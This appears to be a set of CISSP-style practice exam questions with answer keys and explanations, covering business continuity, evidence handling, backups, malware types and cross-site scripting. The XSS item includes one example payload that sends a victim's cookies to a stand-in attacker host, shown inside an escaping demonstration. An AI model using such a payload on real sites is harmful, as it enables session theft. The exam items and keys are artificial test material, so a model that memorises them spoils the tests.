This will expose any weaknesses in the plan and ensure the primary site has been properly repaired before moving back. Moving critical assets first may induce a second disaster if the primary site has not been repaired properly.
The first group to go back would test items such as connectivity, HVAC, power, water, improper procedures, and/or steps that have been overlooked or not done properly. By moving these first, and fixing any problems identified, the critical operations of the company are not negatively affected.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 9: Disaster Recovery and Business continuity (page 621).
Which of the following categories of hackers poses the greatest threat?
Disgruntled employees
Student hackers
Criminal hackers
Corporate spies
According to the authors, hackers fall in these categories, in increasing threat order: security experts, students, underemployed adults, criminal hackers, corporate spies and disgruntled employees.
Disgruntled employees are the most dangerous security problem of all because they are most likely to have a good knowledge of the organization's IT systems and security measures.
Source: STREBE, Matthew and PERKINS, Charles, Firewalls 24seven, Sybex 2000, Chapter 2: Hackers.
Which of the following tasks is NOT usually part of a Business Impact Analysis (BIA)?
Calculate the risk for each different business function.
Identify the company’s critical business functions.
Calculate how long these functions can survive without these resources.
Develop a mission statement.
The Business Impact Analysis is critical for the development of a business continuity plan (BCP). It identifies risks, critical processes and resources needed in case of recovery and quantifies the impact a disaster will have upon the organization. The development of a mission statement is normally performed before the BIA.
A BIA (business impact analysis ) is considered a functional analysis, in which a team collects data through interviews and documentary sources; documents business functions, activities, and transactions ; develops a hierarchy of business functions; and finally applies a classification scheme to indicate each individual function’s criticality level.
BIA Steps
The more detailed and granular steps of a BIA are outlined here:
1. Select individuals to interview for data gathering.
2. Create data-gathering techniques (surveys, questionnaires, qualitative and quantitative approaches).
3. Identify the company’s critical business functions.
4. Identify the resources these functions depend upon.
5. Calculate how long these functions can survive without these resources.
6. Identify vulnerabilities and threats to these functions.
7. Calculate the risk for each different business function.
8. Document findings and report them to management.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Location 21076). Auerbach Publications. Kindle Edition.
and
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (p. 905-910). McGraw-Hill. Kindle Edition.
In the statement below, fill in the blank:
Law enforcement agencies must get a warrant to search and seize an individual's property, as stated in the _____ Amendment.
First.
Second.
Third.
Fourth.
The Fourth Amendment does not apply to a seizure or an arrest by private citizens.
Search and seizure activities can get tricky depending on what is being searched for and where.
For example, American citizens are protected by the Fourth Amendment against unlawful search and seizure, so law enforcement agencies must have probable cause and request a search warrant from a judge or court before conducting such a search.
The actual search can only take place in the areas outlined by the warrant. The Fourth Amendment does not apply to actions by private citizens unless they are acting as police agents. So, for example, if Kristy’s boss warned all employees that the management could remove files from their computers at any time, and her boss was not a police officer or acting as a police agent, she could not successfully claim that her Fourth Amendment rights were violated. Kristy’s boss may have violated some specific privacy laws, but he did not violate Kristy’s Fourth Amendment rights.
In some circumstances, a law enforcement agent may seize evidence that is not included in the warrant, such as if the suspect tries to destroy the evidence. In other words, if there is an impending possibility that evidence might be destroyed, law enforcement may quickly seize the evidence to prevent its destruction. This is referred to as exigent circumstances, and a judge will later decide whether the seizure was proper and legal before allowing the evidence to be admitted. For example, if a police officer had a search warrant that allowed him to search a suspect’s living room but no other rooms, and then he saw the suspect dumping cocaine down the toilet, the police officer could seize the cocaine even though it was in a room not covered under his search warrant. After evidence is gathered, the chain of custody needs to be enacted and enforced to make sure the evidence’s integrity is not compromised.
All other choices were only distractors.
Reference(s) used for this question:
Harris, Shon (2012-10-25). CISSP All-in-One Exam Guide, 6th Edition (p. 1057). McGraw-Hill. Kindle Edition.
Which backup type run at regular intervals would take the least time to complete?
Full Backup
Differential Backup
Incremental Backup
Disk Mirroring
Incremental backups only back up data that has changed since the last backup (the archive bit is cleared after the backup, so unchanged files are not backed up again).
Although the incremental backup is the fastest to perform, it usually makes the restore process more time consuming.
In some cases, the window available for backup may not be long enough to backup all the data on the system during each backup. In that case, differential or incremental backups may be more appropriate.
In an incremental backup, only the files that changed since the last backup will be backed up.
In a differential backup, only the files that changed since the last full backup will be backed up.
In general, differentials require more space than incremental backups while incremental backups are faster to perform. On the other hand, restoring data from incremental backups requires more time than differential backups. To restore from incremental backups, the last full backup and all of the incremental backups performed are combined. In contrast, restoring from a differential backup requires only the last full backup and the latest differential.
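The selection logic can be sketched in Python using file modification times as a stand-in for the archive bit; the /data path and the backup times below are hypothetical.

```python
import os
import time

def files_changed_since(root: str, reference_time: float) -> list:
    """Return files under `root` modified after `reference_time`.
    (Timestamps stand in for the Windows archive bit described above.)"""
    changed = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.getmtime(path) > reference_time:
                changed.append(path)
    return changed

# Hypothetical schedule: full backup five nights ago, another backup last night.
last_full_backup = time.time() - 5 * 24 * 3600
last_any_backup  = time.time() - 1 * 24 * 3600

differential_set = files_changed_since("/data", last_full_backup)  # grows every day
incremental_set  = files_changed_since("/data", last_any_backup)   # only one day's changes
```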
The following are incorrect answers:
Differential backups back up all data changed since the last full backup (the archive bit is not reset).
Full backups back up all selected data, regardless of the archive bit, and reset the archive bit.
Disk mirroring is not considered as a backup type.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 20385-20390). Auerbach Publications. Kindle Edition.
and
HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 9: Disaster Recovery and Business continuity (page 618).
Which of the following best defines a Computer Security Incident Response Team (CSIRT)?
An organization that provides a secure channel for receiving reports about suspected security incidents.
An organization that ensures that security incidents are reported to the authorities.
An organization that coordinates and supports the response to security incidents.
An organization that disseminates incident-related information to its constituency and other involved parties.
RFC 2828 (Internet Security Glossary) defines a Computer Security Incident Response Team (CSIRT) as an organization that coordinates and supports the response to security incidents that involves sites within a defined constituency. This is the proper definition for the CSIRT. To be considered a CSIRT, an organization must provide a secure channel for receiving reports about suspected security incidents, provide assistance to members of its constituency in handling the incidents and disseminate incident-related information to its constituency and other involved parties. Security-related incidents do not necessarily have to be reported to the authorities.
Source: SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
What is called the probability that a threat to an information system will materialize?
Threat
Risk
Vulnerability
Hole
The Answer: Risk: The potential for harm or loss to an information system or network; the probability that a threat will materialize.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Pages 16, 32.
In order to be able to successfully prosecute an intruder:
A point of contact should be designated to be responsible for communicating with law enforcement and other external agencies.
A proper chain of custody of evidence has to be preserved.
Collection of evidence has to be done following predefined procedures.
Whenever possible, analyze a replica of the compromised resource, not the original, thereby avoiding inadvertently tampering with evidence.
If you intend on prosecuting an intruder, evidence has to be collected in a lawful manner and, most importantly, protected through a secure chain-of-custody procedure that tracks who has been involved in handling the evidence and where it has been stored. All other choices are all important points, but not the best answer, since no prosecution is possible without a proper, provable chain of custody of evidence.
Source: ALLEN, Julia H., The CERT Guide to System and Network Security Practices, Addison-Wesley, 2001, Chapter 7: Responding to Intrusions (pages 282-285).
What is electronic vaulting?
Information is backed up to tape on an hourly basis and is stored in an on-site vault.
Information is backed up to tape on a daily basis and is stored in an on-site vault.
Transferring electronic journals or transaction logs to an off-site storage facility
A transfer of bulk information to a remote central backup facility.
Electronic vaulting is defined as "a method of transferring bulk information to off-site facilities for backup purposes". Remote Journaling is the same concept as electronic vaulting, but has to do with journals and transaction logs, not the actual files.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 9: Disaster Recovery and Business continuity (page 619).
During the salvage of the Local Area Network and Servers, which of the following steps would normally be performed first?
Damage mitigation
Install LAN communications network and servers
Assess damage to LAN and servers
Recover equipment
The first activity in every recovery plan is damage assessment, immediately followed by damage mitigation.
This first activity would typically include assessing the damage to all network and server components (including cables, boards, file servers, workstations, printers, network equipment), making a list of all items to be repaired or replaced, selecting appropriate vendors and relaying findings to Emergency Management Team.
Following damage mitigation, equipment can be recovered and LAN communications network and servers can be reinstalled.
Source: BARNES, James C. & ROTHSTEIN, Philip J., A Guide to Business Continuity Planning, John Wiley & Sons, 2001 (page 135).
A copy of evidence or oral description of its contents; which is not as reliable as best evidence is what type of evidence?
Direct evidence
Circumstantial evidence
Hearsay evidence
Secondary evidence
Secondary evidence is a copy of evidence or oral description of its contents; not as reliable as best evidence
Here are other types of evidence:
Best evidence — original or primary evidence rather than a copy or duplicate of the evidence
Direct evidence — proves or disproves a specific act through oral testimony based on information gathered through the witness’s five senses
Conclusive evidence — incontrovertible; overrides all other evidence
Opinions — two types: Expert — may offer an opinion based on personal expertise and facts, Non-expert — may testify only as to facts
Circumstantial evidence — inference of information from other, immediate, relevant facts
Corroborative evidence — supporting evidence used to help prove an idea or point; used as a supplementary tool to help prove a primary piece of evidence
Hearsay evidence (3rd party) — oral or written evidence presented in court that is second hand and has no firsthand proof of accuracy or reliability
(i) Usually not admissible in court
(ii) Computer generated records and other business records are in hearsay category
(iii) Certain exceptions to hearsay rule:
(1) Made during the regular conduct of business and authenticated by witnesses familiar with their use
(2) Relied upon in the regular course of business
(3) Made by a person with knowledge of records
(4) Made by a person with information transmitted by a person with knowledge
(5) Made at or near the time of occurrence of the act being investigated
(6) In the custody of the witness on a regular basis
Which one of the following is NOT one of the outcomes of a vulnerability assessment?
Quantitative loss assessment
Qualitative loss assessment
Formal approval of BCP scope and initiation document
Defining critical support areas
When seeking to determine the security position of an organization, the security professional will eventually turn to a vulnerability assessment to help identify specific areas of weakness that need to be addressed. A vulnerability assessment is the use of various tools and analysis methodologies to determine where a particular system or process may be susceptible to attack or misuse. Most vulnerability assessments concentrate on technical vulnerabilities in systems or applications, but the assessment process is equally as effective when examining physical or administrative business processes.
The vulnerability assessment is often part of a BIA. It is similar to a Risk Assessment in that there is a quantitative (financial) section and a qualitative (operational) section. It differs in that it is smaller than a full risk assessment and is focused on providing information that is used solely for the business continuity plan or disaster recovery plan.
A function of a vulnerability assessment is to conduct a loss impact analysis. Because there will be two parts to the assessment, a financial assessment and an operational assessment, it will be necessary to define loss criteria both quantitatively and qualitatively.
Quantitative loss criteria may be defined as follows:
Incurring financial losses from loss of revenue, capital expenditure, or personal liability resolution
The additional operational expenses incurred due to the disruptive event
Incurring financial loss from resolution of violation of contract agreements
Incurring financial loss from resolution of violation of regulatory or compliance requirements
Qualitative loss criteria may consist of the following:
The loss of competitive advantage or market share
The loss of public confidence or credibility, or incurring public embarrassment
During the vulnerability assessment, critical support areas must be defined in order to assess the impact of a disruptive event. A critical support area is defined as a business unit or function that must be present to sustain continuity of the business processes, maintain life safety, or avoid public relations embarrassment.
Critical support areas could include the following:
Telecommunications, data communications, or information technology areas
Physical infrastructure or plant facilities, transportation services
Accounting, payroll, transaction processing, customer service, purchasing
The granular elements of these critical support areas will also need to be identified. By granular elements we mean the personnel, resources, and services the critical support areas need to maintain business continuity.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 4628-4632). Auerbach Publications. Kindle Edition.
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Page 277.
The scope and focus of the Business continuity plan development depends most on:
Directives of Senior Management
Business Impact Analysis (BIA)
Scope and Plan Initiation
Skills of BCP committee
SearchStorage.com Definitions mentions "As part of a disaster recovery plan, BIA is likely to identify costs linked to failures, such as loss of cash flow, replacement of equipment, salaries paid to catch up with a backlog of work, loss of profits, and so on.
A BIA report quantifies the importance of business components and suggests appropriate fund allocation for measures to protect them. The possibilities of failures are likely to be assessed in terms of their impacts on safety, finances, marketing, legal compliance, and quality assurance.
Where possible, impact is expressed monetarily for purposes of comparison. For example, a business may spend three times as much on marketing in the wake of a disaster to rebuild customer confidence."
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Page 278.
Once evidence is seized, a law enforcement officer should emphasize which of the following?
Chain of command
Chain of custody
Chain of control
Chain of communications
All people that handle the evidence from the time the crime was committed through the final disposition must be identified. This is to ensure that the evidence can be used and has not been tampered with.
The following answers are incorrect:
chain of command. Is incorrect because chain of command is the order of authority and does not apply to evidence.
chain of control. Is incorrect because it is a distractor.
chain of communications. Is incorrect because it is a distractor.
Under United States law, an investigator's notebook may be used in court in which of the following scenarios?
When the investigator is unwilling to testify.
When other forms of physical evidence are not available.
To refresh the investigator's memory while testifying.
If the defense has no objections.
An investigator's notebook cannot be used as evidence in court. It can only be used by the investigator to refresh his memory during a proceeding, but it cannot be submitted as evidence in any form.
The following answers are incorrect:
When the investigator is unwilling to testify. Is incorrect because the notebook cannot be submitted as evidence in any form.
When other forms of physical evidence are not available. Is incorrect because the notebook cannot be submitted as evidence in any form.
If the defense has no objections. Is incorrect because the notebook cannot be submitted as evidence in any form.
Which of the following steps should be one of the first steps performed in a Business Impact Analysis (BIA)?
Identify all CRITICAL business units within the organization.
Evaluate the impact of disruptive events.
Estimate the Recovery Time Objectives (RTO).
Identify and Prioritize Critical Organization Functions
Project Initiation and Management
The first step in building the Business Continuity program is project initiation and management. During this phase, the following activities will occur:
Obtain senior management support to go forward with the project
Define a project scope, the objectives to be achieved, and the planning assumptions
Estimate the project resources needed to be successful, both human resources and financial resources
Define a timeline and major deliverables of the project.
In this phase, the program will be managed like a project, and a project manager should be assigned to the BC and DR domain.
The next step in the planning process is to have the planning team perform a BIA. The BIA will help the company decide what needs to be recovered, and how quickly. Mission functions are typically designated with terms such as critical, essential, supporting and nonessential to help determine the appropriate prioritization.
One of the first steps of a BIA is to Identify and Prioritize Critical Organization Functions. All organizational functions and the technology that supports them need to be classified based on their recovery priority. Recovery time frames for organization operations are driven by the consequences of not performing the function. The consequences may be the result of business lost during the down period; contractual commitments not met, resulting in fines or lawsuits; or lost goodwill with customers.
All other answers are incorrect.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 21073-21075). Auerbach Publications. Kindle Edition.
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 20697-20710). Auerbach Publications. Kindle Edition.
The absence of a safeguard, or a weakness in a system that may possibly be exploited is called a(n)?
Threat
Exposure
Vulnerability
Risk
A vulnerability is a weakness in a system that can be exploited by a threat.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 237.
Java is not:
Object-oriented.
Distributed.
Architecture Specific.
Multithreaded.
Java was developed so that the same program could be executed on multiple hardware and operating system platforms; it is not architecture specific.
The following answers are incorrect:
Object-oriented. Is not correct because Java is object-oriented; it uses the object-oriented programming methodology.
Distributed. Is incorrect because Java was designed to be distributed, i.e. to run on multiple computer systems over a network.
Multithreaded. Is incorrect because Java is multithreaded; it supports multiple concurrent threads of execution.
A virus is a program that can replicate itself on a system but not necessarily spread itself by network connections.
What best describes a scenario when an employee has been shaving off pennies from multiple accounts and depositing the funds into his own bank account?
Data fiddling
Data diddling
Salami techniques
Trojan horses
The salami technique involves committing many small, barely noticeable thefts, such as shaving fractions of a cent from many accounts, which add up to a significant amount deposited into the perpetrator's own account. Data diddling, by contrast, is the alteration of data before or during entry into a system.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2001, Page 644.
The high availability of multiple all-inclusive, easy-to-use hacking tools that do NOT require much technical knowledge has brought a growth in the number of which type of attackers?
Black hats
White hats
Script kiddies
Phreakers
Script kiddies are low- to moderately-skilled hackers who use readily available scripts and tools to easily launch attacks against victims.
The other answers are incorrect because :
Black hats is incorrect as they are malicious, skilled hackers.
White hats is incorrect as they are security professionals.
Phreakers is incorrect as they are telephone/PBX (private branch exchange) hackers.
Reference : Shon Harris AIO v3 , Chapter 12: Operations security , Page : 830
Which of the following virus types changes some of its characteristics as it spreads?
Boot Sector
Parasitic
Stealth
Polymorphic
A Polymorphic virus produces varied but operational copies of itself in hopes of evading anti-virus software.
The following answers are incorrect:
boot sector. Is incorrect because it is not the best answer. A boot sector virus attacks the boot sector of a drive. It describes the type of attack of the virus and not the characteristics of its composition.
parasitic. Is incorrect because it is not the best answer. A parasitic virus attaches itself to other files but does not change its characteristics.
stealth. Is incorrect because it is not the best answer. A stealth virus attempts to hide changes of the affected files but not itself.
Which virus category has the capability of changing its own code, making it harder to detect by anti-virus software?
Stealth viruses
Polymorphic viruses
Trojan horses
Logic bombs
A polymorphic virus has the capability of changing its own code, enabling it to have many different variants, making it harder to detect by anti-virus software. The particularity of a stealth virus is that it tries to hide its presence after infecting a system. A Trojan horse is a set of unauthorized instructions that are added to or replacing a legitimate program. A logic bomb is a set of instructions that is initiated when a specific event occurs.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 11: Application and System Development (page 786).
Which of the following technologies is a target of XSS or CSS (Cross-Site Scripting) attacks?
Web Applications
Intrusion Detection Systems
Firewalls
DNS Servers
XSS or Cross-Site Scripting is a threat to web applications where malicious code is placed on a website and attacks the user by abusing their existing authenticated session.
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. These scripts can even rewrite the content of the HTML page.
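The paragraph above notes that XSS succeeds when user input reaches the output without validation or encoding. As a minimal illustration (using Python's standard html module rather than any particular web framework), escaping user input before it is placed in a page renders an injected script tag harmless:

```python
import html

def render_comment(user_input: str) -> str:
    """Encode user-supplied text before placing it in an HTML page."""
    return "<p>" + html.escape(user_input) + "</p>"

malicious = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
print(render_comment(malicious))
# <p>&lt;script&gt;document.location=&quot;http://evil.example/?c=&quot;+document.cookie&lt;/script&gt;</p>
```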
Mitigation:
Configure your IPS - Intrusion Prevention System to detect and suppress this traffic.
Input Validation on the web application to normalize inputted data.
Set web apps to bind session cookies to the IP Address of the legitimate user and only permit that IP Address to use that cookie.
See the XSS (Cross Site Scripting) Prevention Cheat Sheet
See the Abridged XSS Prevention Cheat Sheet
See the DOM based XSS Prevention Cheat Sheet
See the OWASP Development Guide article on Phishing.
See the OWASP Development Guide article on Data Validation.
The following answers are incorrect:
Intrusion Detection Systems: Sorry. IDS systems aren't usually the target of XSS attacks, but a properly configured IDS/IPS can detect and report on malicious strings and suppress the TCP connection in an attempt to mitigate the threat.
Firewalls: Sorry. Firewalls aren't usually the target of XSS attacks.
DNS Servers: Same as above, DNS Servers aren't usually targeted in XSS attacks but they play a key role in the domain name resolution in the XSS attack process.
The following reference(s) was used to create this question:
CCCure Holistic Security+ CBT and Curriculum
and
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
In computing, what is the name of a non-self-replicating type of malware program containing malicious code that appears to have some useful purpose but that, when executed, carries out actions unknown to the person installing it, typically causing loss or theft of data and possible system harm?
virus
worm
Trojan horse.
trapdoor
A trojan horse is any code that appears to have some useful purpose but also contains code that has a malicious or harmful purpose imbedded in it. A Trojan often also includes a trapdoor as a means to gain access to a computer system bypassing security controls.
Wikipedia defines it as:
A Trojan horse, or Trojan, in computing is a non-self-replicating type of malware program containing malicious code that, when executed, carries out actions determined by the nature of the Trojan, typically causing loss or theft of data, and possible system harm. The term is derived from the story of the wooden horse used to trick defenders of Troy into taking concealed warriors into their city in ancient Greece, because computer Trojans often employ a form of social engineering, presenting themselves as routine, useful, or interesting in order to persuade victims to install them on their computers.
The following answers are incorrect:
virus. Is incorrect because a virus does not masquerade as a useful program; its sole purpose is malicious, and its defining characteristic is self-replication. A computer virus is a type of malware that, when executed, replicates by inserting copies of itself (possibly modified) into other computer programs, data files, or the boot sector of the hard drive; when this replication succeeds, the affected areas are then said to be "infected".
worm. Is incorrect because a Worm is similar to a Virus but does not require user intervention to execute. Rather than doing damage to the system, worms tend to self-propagate and devour the resources of a system. A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
trapdoor. Is incorrect because a trapdoor is a means to bypass security by hiding an entry point into a system. Trojan Horses often have a trapdoor imbedded in them.
References:
http://en.wikipedia.org/wiki/Trojan_horse_%28computing%29
and
http://en.wikipedia.org/wiki/Computer_virus
and
http://en.wikipedia.org/wiki/Computer_worm
and
http://en.wikipedia.org/wiki/Backdoor_%28computing%29
Which of the following computer crime is MORE often associated with INSIDERS?
IP spoofing
Password sniffing
Data diddling
Denial of service (DOS)
Data diddling refers to the alteration of existing data, most often before it is entered into an application. This type of crime is extremely common and can be prevented by using appropriate access controls and proper segregation of duties. It is more likely to be perpetrated by insiders, who have access to data before it is processed.
The other answers are incorrect because :
IP Spoofing is not correct as the question asks about the crime associated with insiders. Spoofing is generally accomplished from the outside.
Password sniffing is also not the BEST answer as it requires a lot of technical knowledge in understanding the encryption and decryption process.
Denial of service (DOS) is also incorrect as most Denial of service attacks occur over the internet.
Reference : Shon Harris , AIO v3 , Chapter-10 : Law , Investigation & Ethics , Page : 758-760.
Crackers today are MOST often motivated by their desire to:
Help the community in securing their networks.
Seeing how far their skills will take them.
Getting recognition for their actions.
Gaining Money or Financial Gains.
A few years ago the best choice for this question would have been seeing how far their skills could take them. Today this has changed greatly: most crimes committed are financially motivated.
Profit is the most widespread motive behind all cybercrimes and, indeed, most crimes: everyone wants to make money. Hacking for money or for free services includes a smorgasbord of crimes such as embezzlement, corporate espionage and being a “hacker for hire”. Scams are easier to undertake but the likelihood of success is much lower. Money-seekers come from any lifestyle, but those with persuasive skills make better con artists in the same way as those who are exceptionally tech-savvy make better “hacks for hire”.
"White hats" are the security specialists (as opposed to Black Hats) interested in helping the community in securing their networks. They will test systems and network with the owner authorization.
A Black Hat is someone who uses his skills for offensive purposes. They do not seek authorization before they attempt to compromise the security mechanisms in place.
"Grey Hats" are people who sometimes work as a White hat and other times they will work as a "Black Hat", they have not made up their mind yet as to which side they prefer to be.
The following are incorrect answers:
All the other choices could be possible reasons but the best one today is really for financial gains.
References used for this question:
http://library.thinkquest.org/04oct/00460/crimeMotives.html
and
http://www.informit.com/articles/article.aspx?p=1160835
and
http://www.aic.gov.au/documents/1/B/A/%7B1BA0F612-613A-494D-B6C5-06938FE8BB53%7Dhtcb006.pdf
What do the ILOVEYOU and Melissa virus attacks have in common?
They are both denial-of-service (DOS) attacks.
They have nothing in common.
They are both masquerading attacks.
They are both social engineering attacks.
While a masquerading attack can be considered a type of social engineering, the Melissa and ILOVEYOU viruses are examples of masquerading attacks, even if they may also cause some kind of denial of service due to mail servers being flooded with messages. In this case, the receiver confidently opens a message coming from a trusted individual, only to find that the message was sent using the trusted party's identity.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, Chapter 10: Law, Investigation, and Ethics (page 650).
What is malware that can spread itself over open network connections?
Worm
Rootkit
Adware
Logic Bomb
Computer worms are also known as Network Mobile Code, or a virus-like bit of code that can replicate itself over a network, infecting adjacent computers.
A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.
A notable example is the SQL Slammer computer worm that spread globally in ten minutes on January 25, 2003. I myself came to work that day as a software tester and found all my SQL servers infected and actively trying to infect other computers on the test network.
A patch had been released a year prior by Microsoft; if systems were not patched and were exposed to a 376-byte UDP packet from an infected host, the system would become compromised.
Ordinarily, infected computers are not to be trusted and must be rebuilt from scratch but the vulnerability could be mitigated by replacing a single vulnerable dll called sqlsort.dll.
Replacing that with the patched version completely disabled the worm which really illustrates to us the importance of actively patching our systems against such network mobile code.
The following answers are incorrect:
- Rootkit: Sorry, this isn't correct because a rootkit isn't ordinarily classified as network mobile code like a worm is. This isn't to say that a rootkit couldn't be included in a worm, just that a rootkit isn't usually classified like a worm. A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware.
- Adware: Incorrect answer. Sorry but adware isn't usually classified as a worm. Adware, or advertising-supported software, is any software package which automatically renders advertisements in order to generate revenue for its author. The advertisements may be in the user interface of the software or on a screen presented to the user during the installation process. The functions may be designed to analyze which Internet sites the user visits and to present advertising pertinent to the types of goods or services featured there. The term is sometimes used to refer to software that displays unwanted advertisements.
- Logic Bomb: Logic bombs like adware or rootkits could be spread by worms if they exploit the right service and gain root or admin access on a computer.
The following reference(s) was used to create this question:
The CCCure CompTIA Holistic Security+ Tutorial and CBT
and
http://en.wikipedia.org/wiki/Rootkit
and
http://en.wikipedia.org/wiki/Computer_worm
and
http://en.wikipedia.org/wiki/Adware